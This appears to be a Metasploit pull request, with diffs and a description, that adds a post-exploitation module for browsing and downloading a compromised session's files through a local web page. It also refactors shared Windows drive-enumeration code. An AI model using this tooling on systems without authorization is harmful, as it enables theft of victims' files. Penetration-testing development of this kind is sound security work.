### PR TITLE
add module to access a sessions filesystem in a browser

### DIFF
--- a/documentation/modules/post/multi/manage/fileshare.md
+++ b/documentation/modules/post/multi/manage/fileshare.md
@@ -1,0 +1,10 @@
+This module allows you to browse the session filesystem via a local browser window.
+
+## Verification Steps
+
+1. Obtain a target session
+2. Do `use post/multi/manage/fileshare`
+3. Do `set SESSION [SESSION]`
+4. Do `run`
+5. Open the page in a browser
+

--- a/lib/msf/core/post/file.rb
+++ b/lib/msf/core/post/file.rb
@@ -84,9 +84,7 @@ module Msf::Post::File
     end
 
     if session.type == 'powershell'
-      dir = session.shell_command_token("Get-ChildItem -f \"#{directory}\" | Format-Table Name").split(/[\r\n]+/)
-      dir.slice!(0..2) if dir.length > 2
-      return dir
+      return cmd_exec("Get-ChildItem \"#{directory}\" -Name").split(/[\r\n]+/)
     end
 
     if session.platform == 'windows'

--- a/lib/msf/core/post/file.rb
+++ b/lib/msf/core/post/file.rb
@@ -696,19 +696,27 @@ module Msf::Post::File
   # Return a list of the Windows Drives
   #
   def get_drives
-    if session.type != "meterpreter" && session.platform != 'windows'
+    if session.platform != 'windows'
       return false
     end
-    bitmask = session.railgun.kernel32.GetLogicalDrives()["return"]
     drives = []
-    letters = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
-    (0..25).each do |i|
-      test = letters[i,1]
-      rem = bitmask % (2**(i+1))
-
-      if rem > 0
-        drives << test
-        bitmask = bitmask - rem
+    if session.type == "meterpreter" && session.railgun
+      bitmask = session.railgun.kernel32.GetLogicalDrives()["return"]
+      letters = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
+      (0..25).each do |i|
+        label = letters[i,1]
+        rem = bitmask % (2**(i+1))
+        if rem > 0
+          drives << "#{label}:/"
+          bitmask = bitmask - rem
+        end
+      end
+    else
+      disks = cmd_exec("wmic logicaldisk get caption").split("\r\n")
+      for disk in disks
+        if /([A-Z]):/ =~ disk
+          drives << "#{disk[0]}:/"
+        end
       end
     end
 

--- a/lib/msf/core/post/file.rb
+++ b/lib/msf/core/post/file.rb
@@ -705,7 +705,7 @@ module Msf::Post::File
         label = letters[i,1]
         rem = bitmask % (2**(i+1))
         if rem > 0
-          drives << "#{label}:/"
+          drives << label
           bitmask = bitmask - rem
         end
       end
@@ -713,7 +713,7 @@ module Msf::Post::File
       disks = cmd_exec("wmic logicaldisk get caption").split("\r\n")
       for disk in disks
         if /([A-Z]):/ =~ disk
-          drives << "#{disk[0]}:/"
+          drives << disk[0]
         end
       end
     end

--- a/lib/msf/core/post/file.rb
+++ b/lib/msf/core/post/file.rb
@@ -692,6 +692,31 @@ module Msf::Post::File
     return uncompressed_fragment
   end
 
+  #
+  # Return a list of the Windows Drives
+  #
+  def get_drives
+    if session.type != "meterpreter" && session.platform != 'windows'
+      return false
+    end
+    bitmask = session.railgun.kernel32.GetLogicalDrives()["return"]
+    drives = []
+    letters = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
+    (0..25).each do |i|
+      test = letters[i,1]
+      rem = bitmask % (2**(i+1))
+
+      if rem > 0
+        drives << test
+        bitmask = bitmask - rem
+      end
+    end
+
+    drives
+  end
+
+protected
+
   # Checks to see if there are non-ansi or newline characters in a given string
   #
   # @param data [String] String to check for non-ansi or newline chars

--- a/modules/post/multi/manage/fileshare.rb
+++ b/modules/post/multi/manage/fileshare.rb
@@ -21,7 +21,7 @@ class MetasploitModule < Msf::Post
         'License' => MSF_LICENSE,
         'Author' => [ 'timwr'],
         'Platform' => [ 'linux', 'win', 'osx' ],
-        'SessionTypes' => [ 'meterpreter', 'shell' ],
+        'SessionTypes' => [ 'meterpreter', 'shell', 'powershell' ],
         'DefaultOptions' => { 'SRVHOST' => '127.0.0.1' },
         'Notes' =>
           {

--- a/modules/post/multi/manage/fileshare.rb
+++ b/modules/post/multi/manage/fileshare.rb
@@ -49,8 +49,9 @@ class MetasploitModule < Msf::Post
     contents = []
     if file_path == '/' && session.platform == 'windows'
       get_drives.each do |drive|
-        furl = uripath + drive
-        contents << [furl, drive]
+        driveurl = drive + ':/'
+        furl = uripath + driveurl
+        contents << [furl, driveurl]
       end
       return contents
     end

--- a/modules/post/multi/manage/fileshare.rb
+++ b/modules/post/multi/manage/fileshare.rb
@@ -1,0 +1,136 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+require 'cgi'
+
+class MetasploitModule < Msf::Post
+
+  include Msf::Post::File
+  include Msf::Exploit::Remote::HttpServer
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Browse the session filesystem in a Web Browser',
+        'Description' => %q{
+          This module allows you to browse the session filesystem via a local
+          browser window.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [ 'timwr'],
+        'Platform' => [ 'linux', 'win', 'osx' ],
+        'SessionTypes' => [ 'meterpreter' ],
+        'DefaultOptions' => { 'SRVHOST' => '127.0.0.1' },
+        'Notes' =>
+          {
+            'Reliability' => [ ],
+            'SideEffects' => [ ],
+            'Stability' => [ CRASH_SAFE ]
+          }
+      )
+    )
+  end
+
+  def run
+    exploit
+  end
+
+  def primer
+    uri = get_uri.chomp('/') + '/'
+    current_dir = pwd
+    if session.platform == 'windows'
+      current_dir = current_dir.gsub('\\', '/')
+    end
+    print_status("Current directory: #{uri}#{current_dir}")
+  end
+
+  def list_path(file_path, uripath)
+    contents = []
+    if file_path == '/' && session.platform == 'windows'
+      get_drives.each do |drive|
+        fname = "#{drive}:/"
+        furl = uripath + fname
+        contents << [furl, fname]
+      end
+      return contents
+    end
+
+    base_url = uripath
+    if file_path.starts_with?('/')
+      base_url = base_url.chomp('/')
+    end
+    base_url += file_path.chomp('/') + '/'
+    dir(file_path).each do |file|
+      next if ['.', '..'].include?(file)
+
+      furl = base_url + file
+      contents << [furl, file]
+    end
+    contents
+  end
+
+  def on_request_uri(cli, request)
+    uripath = get_resource.chomp('/')
+
+    # Convert http://127.0.0.1/URIPATH/file/ -> /file
+    if request.uri != uripath && request.uri.starts_with?(uripath)
+      file_path = request.uri[uripath.length, request.uri.length].chomp('/')
+    end
+    if file_path.blank?
+      file_path = '/'
+    end
+
+    uripath += '/'
+
+    # Convert /C: -> C:/
+    if session.platform == 'windows'
+      if file_path.starts_with?('/')
+        file_path = file_path[1, file_path.length]
+      end
+      if /([A-Z]):$/ =~ file_path
+        file_path += '/'
+      end
+    end
+    if file_path.blank?
+      file_path = '/'
+    end
+
+    print_status("Request uri: #{request.uri} file_path: #{file_path} from #{cli.peerhost}")
+    if file?(file_path)
+      # Download the file
+      data = read_file(file_path)
+      send_response(cli, data, { 'Content-Type' => 'application/octet-stream', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0' })
+      return
+    end
+
+    # List the directory
+    body = "<h2>Directory listing for #{CGI.escapeHTML(file_path)}</h2><hr>"
+    body << "<ul>\n"
+    if file_path != '/'
+      basedir = request.uri[0, request.uri.chomp('/').rindex('/')]
+      if basedir.blank?
+        basedir = '/'
+      end
+      body << "<li><a href=\"#{CGI.escapeHTML(basedir)}\">..</a>\n"
+    end
+    list_path(file_path, uripath).each do |furl, fname|
+      body << "<li><a href=\"#{CGI.escapeHTML(furl)}\">#{CGI.escapeHTML(fname)}</a>\n"
+    end
+    body << "</ul>\n"
+    html = %(<html>
+<head>
+<META HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE">
+<META HTTP-EQUIV="CACHE-CONTROL" CONTENT="NO-CACHE">
+<title>Metasploit File Sharing</title>
+</head>
+<body>
+#{body}
+</body>
+</style>
+</html>
+    )
+    send_response(cli, html, { 'Content-Type' => 'text/html', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0' })
+  end
+end

--- a/modules/post/multi/manage/fileshare.rb
+++ b/modules/post/multi/manage/fileshare.rb
@@ -23,12 +23,11 @@ class MetasploitModule < Msf::Post
         'Platform' => [ 'linux', 'win', 'osx' ],
         'SessionTypes' => [ 'meterpreter', 'shell', 'powershell' ],
         'DefaultOptions' => { 'SRVHOST' => '127.0.0.1' },
-        'Notes' =>
-          {
-            'Reliability' => [ ],
-            'SideEffects' => [ ],
-            'Stability' => [ CRASH_SAFE ]
-          }
+        'Notes' => {
+          'Reliability' => [ ],
+          'SideEffects' => [ ],
+          'Stability' => [ CRASH_SAFE ]
+        }
       )
     )
   end

--- a/modules/post/windows/gather/enum_files.rb
+++ b/modules/post/windows/gather/enum_files.rb
@@ -33,24 +33,6 @@ class MetasploitModule < Msf::Post
     )
   end
 
-  def get_drives
-    # #All Credit Goes to mubix for this railgun-FU
-    a = client.railgun.kernel32.GetLogicalDrives()["return"]
-    drives = []
-    letters = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
-    (0..25).each do |i|
-      test = letters[i, 1]
-      rem = a % (2**(i + 1))
-
-      if rem > 0
-        drives << test
-        a = a - rem
-      end
-    end
-
-    return drives
-  end
-
   def download_files(location, file_type)
     sysdriv = client.sys.config.getenv('SYSTEMDRIVE')
     sysnfo = client.sys.config.sysinfo['OS']

--- a/modules/post/windows/gather/forensics/enum_drives.rb
+++ b/modules/post/windows/gather/forensics/enum_drives.rb
@@ -12,6 +12,7 @@
 #    http://msu-nftc.org
 
 class MetasploitModule < Msf::Post
+  include Msf::Post::File
 
   def initialize(info = {})
     super(
@@ -78,21 +79,8 @@ class MetasploitModule < Msf::Post
       print_device(devname)
     end
 
-    # Props to Rob Fuller (mubix at room362.com) for logical drive enumeration code:
-    bitmask = client.railgun.kernel32.GetLogicalDrives()["return"]
-    drives = []
-    letters = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
-    (0..25).each do |i|
-      test = letters[i, 1]
-      rem = bitmask % (2**(i + 1))
-      if rem > 0
-        drives << test
-        bitmask = bitmask - rem
-      end
-    end
-
     print_line ("<Logical Drives:>")
-    drives.each do |i|
+    get_drives.each do |i|
       devname = "\\\\.\\#{i}:"
       print_device(devname)
     end

--- a/modules/post/windows/manage/vmdk_mount.rb
+++ b/modules/post/windows/manage/vmdk_mount.rb
@@ -39,23 +39,6 @@ class MetasploitModule < Msf::Post
     )
   end
 
-  # It returns an array of the drives currently mounted. Credits to mubix for this function.
-  def get_drives
-    a = client.railgun.kernel32.GetLogicalDrives()["return"]
-    drives = []
-    letters = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
-    (0..25).each do |i|
-      test = letters[i, 1]
-      rem = a % (2**(i + 1))
-      if rem > 0
-        drives << test
-        a = a - rem
-      end
-    end
-
-    drives
-  end
-
   def run
     vol = datastore['DRIVE'][0].upcase
     vmdk = datastore['VMDK_PATH']


### PR DESCRIPTION
This pull request adds a quick module that allows you to view the meterpreter sessions filesystem via a locally hosted web page.
This is roughly equivalent to running `python -m SimpleHTTPServer` on the target and then forwarding the port.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] Get a meterpreter session on any platform
- [ ] `meterpreter > run post/multi/manage/fileshare`
- [ ] **Verify** you can then access the sessions filesystem in a browser
- [ ] **Verify** you can download files
- [x] **TODO** add support for windows shell sessions? Linux should work already but Windows needs support in `get_drives`
- [x] **TODO** add documentation?

